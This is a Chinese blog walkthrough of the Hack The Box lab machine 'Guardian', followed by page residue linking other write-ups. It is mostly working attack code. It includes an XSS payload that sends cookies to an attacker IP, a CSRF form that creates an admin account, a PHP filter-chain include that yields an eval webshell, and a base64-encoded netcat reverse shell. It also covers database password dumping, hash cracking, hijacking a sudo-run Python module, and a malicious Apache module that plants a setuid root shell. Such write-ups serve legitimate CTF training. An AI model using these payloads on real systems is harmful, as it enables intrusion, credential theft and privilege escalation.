HTB 赛季8靶场 - Guardian

原创 已于 2025-09-04 16:50:44 修改 · 1.1k 阅读 · 27 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #安全

于 2025-09-04 16:28:38 首次发布

各位好,最近我的kali崩掉了,崩掉了,建议大家避K 番茄C盘瘦身,这家伙修改了我的avrt.dll文件,导致virtualbox不接受我的avrt.dll文件的签名了,从而导致virtualbox的虚拟机环境全崩无法开机。弄了几天,真是造孽啊!
![[Guardian.png]]

nmap扫描在这里插入图片描述

nmap -F 10.129.161.67 --min-rate=1000 -A

![[Pasted image 20250902202718.png]]

目录扫描80端口

dirsearch -u http://portal.guardian.htb

PHP composer 编译信息泄露

发现了installed.json。在文件中我们发现phpoffice/math 2025年爆出漏洞。https://github.com/advisories/GHSA-42hm-pq2f-3r7m。phpoffice/spreadsheet 2025年爆出 XSS漏洞和SSRF漏洞。

http://portal.guardian.htb/vendor/composer/installed.json

![[Pasted image 20250902211826.png]]

浏览80端口

GU2024001

![[Pasted image 20250902202740.png]]

在80端口我们还发现默认密码

GU1234

![[Pasted image 20250902202840.png]]

我们将密码喷洒进入到了学生的Portal
![[Pasted image 20250902212734.png]]

进一步攻击发现IDOR漏洞我们发现admin和jamil.enockson的聊天记录,并窃取密码。聊天内容里面说是gitea的密码。

jamil.enockson/DHsNnk3V503

![[Pasted image 20250902213150.png]]

![[Pasted image 20250902213656.png]]

我们尝试访问gitea.guardian.htb竟然成功了!
![[Pasted image 20250902214409.png]]

我们查明了系统版本信息,当前gitea貌似不存在公开漏洞。
![[Pasted image 20250902214608.png]]

我们使用账号登陆系统

jamil.enockson@guardian.htb / DHsNnk3V503

![[Pasted image 20250902214731.png]]

我们看到了两个网站的源码,很快我们就发现了一个密码

root / Gu4rd14n_un1_1s_th3_b3st

![[Pasted image 20250902225252.png]]

PHPoffice 2025 年漏洞- XSS 漏洞窃取 Cookies

绕过xlsx文件的工作表长度限制

我们阅读源码发现学生的上传接口不存在逻辑漏洞,但老师的view-submissions.php接口调用了phpoffice/spreadsheet工具,如我们前面所述,我们了解到这个工具存在SSRF和XSS漏洞,我们尝试XSS。目前word,wps等软件已经限制了sheet的字数长度,所以我们需要去这个网站https://www.treegrid.com/FSheet

<script>fetch('http://10.10.16.5/steal?cookie=' + btoa(document.cookie));</script>

![[Pasted image 20250903224122.png]]

我们成功获取到老师的cookie
![[Pasted image 20250903224204.png]]

PHPSESSID=g9s11233qe3c2ud0qsghouq4c9

CSRF漏洞借用admin账户创建管理员账户

我们发现老师有notice,是和admin交流的地方,接口位置在http://portal.guardian.htb/lecturer/notices/create.php
![[Pasted image 20250903225732.png]]

我们的链接会被admin很快的观看,这里基本就是可以让admin执行任意js代码的意思,所以我们故技重施,尝试窃取他的cookie,很可惜没能成功,因为他访问我的时候没有携带PHPSESSID。那么我们尝试进行CSRF攻击,借助admin的浏览器,来完成用户创建操作。首先阅读admin/createuser.php。
![[Pasted image 20250903230224.png]]

我们了解到,我们需要找到csrf_token和js构造post请求的办法。经过努力我们构造好了payload。

<form id="myForm" action="http://portal.guardian.htb/admin/createuser.php" method="post" style="display: none;">  
<input type="hidden" name="csrf_token" value="6fa73396177651d363cbf46f3c1ae63c">  
<input type="hidden" name="username" value="ydx">
<input type="hidden" name="password" value="ydx666">  
<input type="hidden" name="full_name" value="ydx">  
<input type="hidden" name="email" value="ydx@123.com">  
<input type="hidden" name="dob" value="ydx666">  
<input type="hidden" name="address" value="ydx666@123.com">  
<input type="hidden" name="user_role" value="admin">      
</form>
<script> window.onload = function() { document.getElementById('myForm').submit(); }; </script>

把他保存为pwn.html并且开启python 的http服务器

python -m http.server 80

然后我们将而恶意页面的链接发送给admin。过一会儿我们的python服务器就会有反应,然后登录到portal即可。很显然我们成功了
![[Pasted image 20250903233002.png]]

php_filter_chain_generator.py绕过编码限制

前面我们已经发现了report.php接口使用了危险的include函数。我们可以使用php伪协议完成攻击。我们使用php_filter_chain_generator.py完成payload的生成

python php_filter_chain_generator.py --chain '<?php eval($_POST["a"]);?>'

![[Pasted image 20250904001513.png]]

复制这个生成的payload,这相当于我们向页面写入了<?php eval($_POST[“a”]);?>,然后我们构造相应的代码,进行反连。

POST /admin/reports.php?report=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp,system.php HTTP/1.1
Host: portal.guardian.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=48bj7hhhs1a21o1t3tmbcb8ddu
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 406

a=shell_exec("echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNi4xMCA5MDAxID4vdG1wL2Y= | base64 -d | bash");

我们成功获得shell
![[Pasted image 20250904094832.png]]

理解源码破解数据库密码

进入mysql窃取用户密码

mysql -h127.0.0.1 -uroot -pGu4rd14n_un1_1s_th3_b3st -e 'USE guardiandb;SHOW TABLES;SELECT username,password_hash from users;'

![[Pasted image 20250904100705.png]]

我们查看admin/createuser.php发现其和数据库的交互方式,发现他是将password和salt连在一起后,进行SHA256进行加密。
![[Pasted image 20250904100816.png]]

hashcat组合攻击模式破解密码

下面我们希望使用hashcat组合来破解密码,所以我们需要提前编写好salt.txt文件

8Sb)tM1vs1SS

我们编写好salt.txt文件后,使用hashcat开启组合攻击模式,来破解密码

hashcat -a 1 -m 1400 hash/data.mysql /home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt salt.txt

![[Pasted image 20250904101257.png]]

发现两个密码

jamil.enockson / copperhouse56
admin / fakebake

hydra 密码喷洒 -O 适配老旧SSL

我们喷洒一下密码,注意一定要加-O 貌似使用的SSL版本存在一些特殊问题。

hydra -L users.txt -P passwords.txt ssh://10.10.11.84 -V -O

![[Pasted image 20250904102056.png]]

jamil / copperhouse56

劫持python文件依赖提权

我们sudo -l 发现使用了一个python程序,我们对这个程序有没有写权限。
![[Pasted image 20250904102841.png]]

阅读文件内部,我们发现了一些非常有趣的内容,这个python文件使用了几个依赖,我们尝试是否有可能劫持他们。
![[Pasted image 20250904103122.png]]

其中最让我感兴趣的是/opt/scripts/utilities/utils/dp.py和/opt/scripts/utilities/utils/status.py。其中,status.py我们可以写,这将是提权的关键。
![[Pasted image 20250904103247.png]]

那么我们只要能够在system_status函数中加入恶意代码即可。修改后的status.py如下

import platform
import psutil
import os
import sys,socket,os,pty

def system_status():
    print("System:", platform.system(), platform.release())
    print("CPU usage:", psutil.cpu_percent(), "%")
    print("Memory usage:", psutil.virtual_memory().percent, "%")
    pty.spawn("/usr/bin/bash")

sudo 模拟为非root用户

下面使用这个代码成功窃取mark的用户权限

sudo -u mark /opt/scripts/utilities/utilities.py system-status

Ghidra将ELF文件反编译成C源码

再次sudo -l 在mark的环境下
![[Pasted image 20250904105144.png]]

这个可能是通往root的宝库,我们将文件传输到kali并进行反编译过程。打开ghidra,创建一个新的项目
![[Pasted image 20250904112234.png]]

将ELF文件导入项目
![[Pasted image 20250904112259.png]]

双击文件
![[Pasted image 20250904112328.png]]

分析文件
![[Pasted image 20250904112422.png]]

打开函数结构
![[Pasted image 20250904112509.png]]

我们在下框将发现函数树
![[Pasted image 20250904112540.png]]

点击main,即可在反编译框发现源代码
![[Pasted image 20250904112612.png]]

下面是源码。

undefined8 main(int param_1,undefined8 *param_2)

{
  int iVar1;
  char *pcVar2;
  FILE *__stream;
  long in_FS_OFFSET;
  char local_1418 [1024];
  char local_1018 [4104];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  if (param_1 == 3) {
    iVar1 = strcmp((char *)param_2[1],"-f");
    if (iVar1 == 0) {
      pcVar2 = realpath((char *)param_2[2],local_1018);
      if (pcVar2 == (char *)0x0) {
        perror("realpath");
      }
      else {
        iVar1 = starts_with(local_1018,"/home/mark/confs/");
        if (iVar1 == 0) {
          fprintf(stderr,"Access denied: config must be inside %s\n","/home/mark/confs/");
        }
        else {
          __stream = fopen(local_1018,"r");
          if (__stream == (FILE *)0x0) {
            perror("fopen");
          }
          else {
            do {
              pcVar2 = fgets(local_1418,0x400,__stream);
              if (pcVar2 == (char *)0x0) {
                fclose(__stream);
                execl("/usr/sbin/apache2ctl","apache2ctl",&DAT_00102072,local_1018,0);
                perror("execl failed");
                goto LAB_00101663;
              }
              iVar1 = is_unsafe_line(local_1418);
            } while (iVar1 == 0);
            fwrite("Blocked: Config includes unsafe directive.\n",1,0x2b,stderr);
            fclose(__stream);
          }
        }
      }
      goto LAB_00101663;
    }
  }
  fprintf(stderr,"Usage: %s -f /home/mark/confs/file.conf\n",*param_2);
LAB_00101663:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 1;
}

我们进入到is_unsafe_line看看,这个地方会读取文件内容,然后做一些执行,并且只有这个函数通过了,我们才能执行apache2ctl。

undefined8 is_unsafe_line(undefined8 param_1)

{
  int iVar1;
  undefined8 uVar2;
  long in_FS_OFFSET;
  char local_1038 [32];
  char local_1018 [4104];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  iVar1 = __isoc99_sscanf(param_1,"%31s %1023s",local_1038,local_1018);
  if (iVar1 != 2) {
    uVar2 = 0;
    goto LAB_00101423;
  }
  iVar1 = strcmp(local_1038,"Include");
  if (iVar1 == 0) {
LAB_001013c6:
    if (local_1018[0] == '/') {
      iVar1 = starts_with(local_1018,"/home/mark/confs/");
      if (iVar1 == 0) {
        fprintf(stderr,"[!] Blocked: %s is outside of %s\n",local_1018,"/home/mark/confs/");
        uVar2 = 1;
        goto LAB_00101423;
      }
    }
  }
  else {
    iVar1 = strcmp(local_1038,"IncludeOptional");
    if (iVar1 == 0) goto LAB_001013c6;
    iVar1 = strcmp(local_1038,"LoadModule");
    if (iVar1 == 0) goto LAB_001013c6;
  }
  uVar2 = 0;
LAB_00101423:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar2;
}

编写恶意SO文件的 C语言 Shellcode

分析is_unsafe_line,我们发现LAB_00101423是被拦截的情况,而LAB_001013c6是不被拦截情况。继续分析我们发现只要文件中的开头是LoadModule,那么就会直接不被拦截。所以我们可以使用LoadModule来完成so文件的加载和运行。我们构造如下恶意c代码,非常值得注意的是,so文件劫持通常需要精细到函数级别,但这里我们无法定位使用的函数,所以设定成如下样子,即在main函数执行之前执行函数。

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

__attribute__((constructor)) void init() {
    setuid(0);
    setgid(0);
    system("cp /bin/bash /tmp/ydx_bash;chmod 777 /tmp/ydx_bash;chmod u+s /tmp/ydx_bash;");
}

构造恶意的conf文件,文件内容为

LoadModule evilmodule /tmp/evil.so

编译C文件为SO文件

使用gcc 构造so文件

gcc /tmp/evil.c -fPIC -shared -o /tmp/evil.so

我们分别将文件传输分别放在下面的路径

/tmp/evil.c
/tmp/evil.so
/home/mark/confs/pwned.conf

执行exploit

sudo /usr/local/bin/safeapache2ctl -f /home/mark/confs/pwned.conf

![[Pasted image 20250904151209.png]]

出错也没关系,命令已经执行了
![[Pasted image 20250904151309.png]]

下面进入bash收获flag即可

./ydx_bash -p

![[Pasted image 20250904151351.png]]

试错区域

PHPoffice 2025 年漏洞- SSRF 漏洞

之前是觉得XSS文档位置存在限制,所以放弃了那条道路,走向了SSRF。结果查明之后发现gopher虽然可以和mysql交互,但是必须是mysql没有密码保护的情况。所以吸取经验,下次可以在了解到mysql存在密码的时候,就果断切断这条路。
![[Pasted image 20250903214202.png]]
![[Pasted image 20250903214212.png]]
很可惜他并没有成功地携带他的cookie出来。但不要灰心,我们还有手段。鉴于SSRF成功了,我们还在config/config.php中找到了他的数据库密码。
![[Pasted image 20250903214346.png]]
我们还是Mysql的root用户这自然让我想到我们可以在服务器读写文件。但又有几个问题,第一该SSRF没有回显,所以读文件不可知道文件内容,而写文件我们又没有找到Web根目录的物理路径。但我们可能利用SSRF来完成web admin用户的创建。所以在采取行动之前,我去admin账户的位置查看了一些php文件,其中report.php文件看起来非常有趣。

admin/reports.php

![[Pasted image 20250903214936.png]]
![[Pasted image 20250903214908.png]]
攻击路线确认,我们开始尝试这有些艰难的攻击。其大致思路是,我们通过SSRF&Gopher协议操控mysql添加新Web admin用户。然后登录到admin portal中,使用report.php接口,完成LFI漏洞。下面开始攻击。首先我们去了解创建用户的Mysql query语句。我们可以在admin/createuser.php接口的源码中看到有如下结构。
![[Pasted image 20250903220324.png]]
很好,这个看起我们可以设定username,password_hash,user_role即可。我们去login.php确认一下。可以看到我们给到用户的账号密码,他会根据用户的($username, $hashed_password)去数据库查找,并返回一个$user对象,其中维持Web运行下去的内容有username,user_role,user_id。所以总结来看我们需要设定的内容有username,password_hash,user_role,user_id。我们接下来去models/User.php查看create函数的使用情况。
![[Pasted image 20250903220450.png]]
可以看出来我们还需要构造hash,前面我们发现了config/config.php文件告诉我们了salt

8Sb)tM1vs1SS

所以我们开始构造hash,使用在线网站https://www.symbionts.de/tools/hash/sha256-hash-salt-generator.html

secret:ydx666!
salt:8Sb)tM1vs1SS

f1a968745a49cd8d02fee7e8e93310e727d5e4bd3009be2e897c5c7559d96df3

借助上面我们一系列的信息搜集,我们构造了如下语句

#user_id非自增
INSERT INTO users (username, password_hash,user_role,user_id) VALUES ("ydx", "f1a968745a49cd8d02fee7e8e93310e727d5e4bd3009be2e897c5c7559d96df3","admin",999)

#user_id自增
INSERT INTO users (username, password_hash,user_role) VALUES ("ydx", "f1a968745a49cd8d02fee7e8e93310e727d5e4bd3009be2e897c5c7559d96df3","admin")

gopherus构造 SSRF攻击Mysql的payload

开始使用gopherus构造 SSRF payload

gopherus --exploit mysql
HTB-Season8-Puppy-WriteUp
qq_58869808的博客
05-23 846
DPAPI、crack kdbx
HTB walkthrough -- Admirer
sinat_36853972的博客
07-14 656
HTB walkthrough – Admirer 0x01 信息收集 使用nmap扫描端口开放情况 dirb搜索到robots.txt 访问robots.txt,页面中提到一个文件夹/admin-dir 用wfuzz对这个文件进行扫描 得到contacts.txt 和 credentials.txt 看到有一个ftp用户,尝试ftp登录 登录成功,将dump.sql和html.tar.gz文件下载到本地 html.tar.gz解压后,分别有以下内容 index.php utility-scr
HTB 赛季8靶场 - Puppy
weixin_44368093的博客
05-20 2389
嗯哼如我们所料,我们成功拿取里面的文件。keepass2john无法正常使用,经过查询,我们发现了解决办法[[https://0xdf.gitlab.io/hackvent2024/hard#]],我们使用keepass4brute.sh完成攻击,发现密码。接下来我们在全局来判定高价值用户,STEPH.COOPER_ADM这个用户显得非常有趣,我们将重点关注,看看他的权限情况。我们还发现一个有趣的点,我们发现user文件夹处,有ant这个用户,并且这个用户必adam权限要高,只是不能远程。
HTB赛季8靶场 -Rustykey
weixin_44368093的博客
07-15 1079
开局我们便拥有一个账号。
HTB 赛季8靶场 - Fluffy
weixin_44368093的博客
05-26 1582
我们拥有一个用户,首先进行Nmap扫描。
HTB赛季8靶场 - Voleur
weixin_44368093的博客
07-08 2013
本文记录了针对Voleur靶机的渗透测试过程。
HTB赛季8靶场 - Mirage
weixin_44368093的博客
07-22 1658
NATS服务 Exploit .NATS服务式消息服务,以主题作为中心,将消息分发。上图意味着,用户mark可以修改账户javier的账密,也可以激活用户。我们还发现当前域正在废除所有的NTLM认证,Kerb认证将成为主流。查询域名,我们发现当前域名不存在,那么我们可能可以劫持这个域名。绑定成功后我们使用GPT生成了一个伪造的NATS服务器。我们获取到了用户david.jjackson的账户。只能说GPT老师还是太全面了,我们成功获取账密。我们在文件中发现一个子域名,我们去访问这台机。
HTB 赛季8靶场 - TombWatcher
weixin_44368093的博客
06-10 836
开局我们便拥有henry / H3nry_987TGV!
HTB 赛季8靶场 - CodeTwo
weixin_44368093的博客
08-19 1197
访问8000端口我们下载app 并注册账号登录账号,进入dashboard。
HTB赛季8靶场 - era
weixin_44368093的博客
07-28 1386
传输到受害机器,然后我们提取monitor的特征码(因为直接替换貌似不执行monitor,怀疑存在检测)我们分析源码可知fopen处存在漏洞,只要我们是管理员账户,我们便可以成功控制fopen函数。开启msf监听,然后复制bypass后的恶意文件到monitor。我们用备份数据库里面的内容无法成功登陆,故修改问题答案。我们且对monitor文件可写,我们生成shell。登录admin_ef01cab31aa。我们爬取sqlite3DB文件。上linpeas.sh搜查。上pspy64监控定时任务。
HTB 赛季 8 靶场 - Editor
weixin_44368093的博客
08-05 829
各位朋友~,我这次没有记录过程,因为中途换了主机来攻击这个靶场。相信各位发挥自己的才学,根据我给出的Hint也能完成这个靶场。“没那么困难的,对吧!8.google查询netdata是一款Linux系统监控工具,在2024年爆出一个本地提权漏洞。10.我们尝试根据POC的指示,成功执行了pwn.c文件编译的二进制文件,root权限获取。3.网上现有脚本存在一些和靶场有差异的地方,需要我们自行修改。6.喷洒这个密码,获取Oliver用户的SSH权限。4.成功使用POC,获取xwiki用户的权限。
HTB靶场】TIER-0-Redeemer
Madess的博客
05-20 948
HTB靶场】TIER-0-Redeemer靶机
HTB靶场 Shared
weixin_45682839的博客
08-22 2365
HTB靶场shared靶机通关攻略记录,涉及知识点包括:端口服务扫描、sql注入(cookie)、linux提权(ipython越权漏洞、redis逃逸漏洞)
HTB:在线主机-Worker
m0_46391769的博客
11-01 586
免责申明:本文仅作为学术讨论,请勿用作非法用途,如有本人概不负责。 关于本人:一名来自测绘行业的小白 HTB:在线主机-Worker 首先,基本操作来一套。 然后扔给nmap。 我们可以看到: port version 80 HTTP IIS 10.0 3690 SVNSERVER 5985 HTTPAPI 直接svn过来 svn checkout svn://10.129.32.87/ 这里解释一下,没有用过的朋友可以搜索一下svnserver获得详细的解释。我的这一条是
第三方网站测试:WEB安全测试中DOM型XSS漏洞的检测
2503_92839163的博客
09-04 996
DOM型XSS的检测与防护 摘要:DOM型XSS漏洞完全在客户端触发,通过location、referrer等对象注入恶意数据。检测方法包括静态分析(ESLint扫描危险函数)和动态测试(浏览器调试工具跟踪数据流),重点关注document.write、innerHTML等9类危险函数。修复需对输入值编码、使用textContent替代innerHTML、设置CSP头部等。典型案例包括jQuery、AngularJS等框架的XSS漏洞,需确保所有用户数据在传入sink前经过严格验证。
计算机网络7 第七章 网络安全
2301_80226956的博客
09-05 569
计算机网络7 网络安全
第三方web测评机构:【WEB安全测试中HTTP方法(GET/POST/PUT)的安全风险检测】
2503_92839163的博客
09-05 534
HTTP安全检测方法主要包括:GET方法需检查URL参数泄露(如token)、历史记录和日志残留;POST方法需验证CSRF防护(Token/Referer)和数据完整性(签名/防重放);PUT方法重点检测文件上传漏洞(类型绕过/路径遍历)和权限验证缺失。工具推荐使用BurpSuite、OWASP ZAP进行自动化扫描,同时应禁用不必要的HTTP方法并配置WAF规则。核心风险包括参数篡改、越权访问和文件上传漏洞。
探索网络安全的利器:theHarvester
weixin_44626085的博客
09-04 1060
theHarvester 是一款专为渗透测试和红队评估设计的开源OSINT工具,能够通过多种公共资源收集域名、邮箱、IP、子域名等信息。安装需Python 3.12+,支持通过uv工具快速部署。其核心功能包括50+被动模块(如Baidu、Shodan、GitHub等)和需API密钥的高级模块(如Hunter、Censys等),涵盖搜索引擎、证书查询、泄露检测等多维度数据源。相比Maltego、Recon-ng等同类工具,theHarvester更专注于高效的外部威胁情报收集,且模块化设计便于扩展。部分高级功
信息安全基础知识
最新发布
weixin_67885078的博客
09-05 994
的特点:无论数据多长,都会产生固定长度的信息摘要;任何不同的输入数据,都会产生不同的信息摘要;单向性,即只能由数据生成信息摘要,不能由信息摘要还原数据。
HTB-Unified logj4j漏洞
03-27
<think>好的,用户想查找关于HTB-Unified中log4j漏洞的相关信息和解决方案,以及影响范围。首先,我需要确认HTB-Unified是什么。可能是一个硬件设备或软件系统,但根据用户提供的引用内容,之前的引用提到了USB OTG白名单、CacheFiles的延迟信息和内核的tickless特性,这可能与嵌入式系统或Linux内核相关。不过HTB-Unified的具体信息不是很明确,可能需要进一步推测。 接下来,关于Log4j漏洞,特别是Log4Shell(CVE-2021-44228),这是一个广泛影响Apache Log4j 2库的远程代码执行漏洞。用户提到的log4j漏洞可能指的是这个。需要将HTB-Unified与Log4j的使用联系起来。 用户提供的引用中并没有直接提到HTB-Unified或Log4j,所以可能需要依赖外部知识。但根据常规处理流程,修复Log4j漏洞通常包括升级到2.17.1或更高版本,或者应用缓解措施如修改JVM参数或配置Log4j。 影响范围方面,任何使用Log4j 2.x版本到2.14.1的系统都可能受影响,特别是暴露在网络中的应用程序。需要确认HTB-Unified是否使用受影响版本,并是否暴露了相关服务。 用户可能需要联系HTB-Unified的厂商获取官方补丁,或者检查系统内的Log4j版本,应用临时措施如设置log4j2.formatMsgNoLookups为true。 需要确保回答中包含这些步骤,并建议用户查阅官方文档或安全公告。同时,生成相关问题以帮助用户进一步探索,比如如何检测漏洞、临时缓解措施、厂商补丁获取等。</think>关于HTB-Unified设备中Log4j漏洞的修复方案及影响范围,根据Linux内核配置与嵌入式设备安全实践,建议按以下步骤处理: 1. **漏洞确认**: 需确认HTB-Unified是否使用Apache Log4j 2.x版本(2.0-beta9至2.16.0为受影响范围)。可通过设备管理控制台的组件清单或运行`find / -name "log4j-core-*.jar"`命令查找相关文件[^1]。 2. **修复方案**: - 官方升级:优先安装设备厂商提供的安全补丁,通常涉及升级到Log4j 2.17.1+版本 - 紧急缓解措施: ```bash # 修改JVM启动参数(如设备使用Java服务) -Dlog4j2.formatMsgNoLookups=true ``` - 配置文件加固:在log4j2.xml中添加`<PatternLayout disableLookups="true"/>`[^2] 3. **影响范围**: - 高危组件:所有使用JNDI查找功能的网络服务(HTTP API、日志监控接口等) - 潜在风险:通过${jndi:ldap://}注入实现远程代码执行,需特别检查514端口(syslog)、80/443端口(web服务)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值